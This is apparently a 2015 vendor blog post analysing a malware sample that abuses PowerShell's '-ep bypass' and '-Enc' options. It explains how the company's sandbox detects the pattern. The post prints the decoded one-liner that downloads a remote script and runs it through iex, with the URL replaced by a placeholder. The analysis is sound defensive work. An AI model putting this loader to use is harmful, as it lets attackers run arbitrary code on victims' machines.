Monday, September 14, 2015

Using powershell as an infection vector

It's been a bit quiet on our blog over the past weeks while we have been busy implementing new features and analyzing samples we come accross on our public webservice (which has a new domain called reverse.it, by the way).

Bypassing Powershell's Execution Policy



About two weeks ago we came accross an interesting sample that was uploaded on our public webservice (and as the 'Do not share' button was not checked, also shared with VirusTotal)*. It uses powershell.exe to bypass the execution policy (see the -ep bypass part of the commandline) and it also uses the -Enc parameter to Base64 encode the expression that is invoked. To be precise, it is trying to download a script from an URL and executing it with a 'Invoke Expression' (iex) call. Here is the syntax:

$w=new-object net.webclient;$w.UseDefaultCredentials=$true;$w.Proxy.Credentials=$w.Credentials;iex($w.downloadstring('<URL>'))

See also the following screenshot from our report, which quite nicely detects this code snippit:


While these kind of bypassing tricks don't seem to be considerably new (see this excellent blogpost), it was the first time we saw it on our webservice and thought it would be a good idea to put some attention to these kind of tricks. You may have noticed in the screenshot above, while the Base64 artifact detection is not yet perfect, we do extract the most signifcant portion as part of the commandline and feedback the result into the signature interface. This ends up triggering all kind of other signatures, e.g. the URL regex pattern signature:


If you would like to see more details (and a download link to the sample), here are two reports on 32-bit and 64-bit environments:

https://www.hybrid-analysis.com/sample/ad58df92e18fdc04a060a0fe09bf3697961a32599d19d0b4cc94fa7a1dd221b0?environmentId=4
https://www.hybrid-analysis.com/sample/ad58df92e18fdc04a060a0fe09bf3697961a32599d19d0b4cc94fa7a1dd221b0?environmentId=2

Conclusion


The fact that malware is "outsourcing" and utilizing Windows components is a general trend I think we are seeing (e.g. the latest rise in COM interface utilization). So staying up-to-date with state of the art methods is a vital process and a mandatory requisite for any IT-Security product. If you have any interesting sample that you think could do better, please do send us a quick note to support@payload-security.com.

* if you upload any file to our webservice, even if you do check the 'Do not share' checkbox, a public report will be generated nevertheless (just with the download link disabled and no VT upload, if unknown). Also, please note that when a sample has been uploaded to VT (and is thereby part of the public domain), we will not delete your report if the upload was unintentional and it contains relevant information for the IT-Sec industry.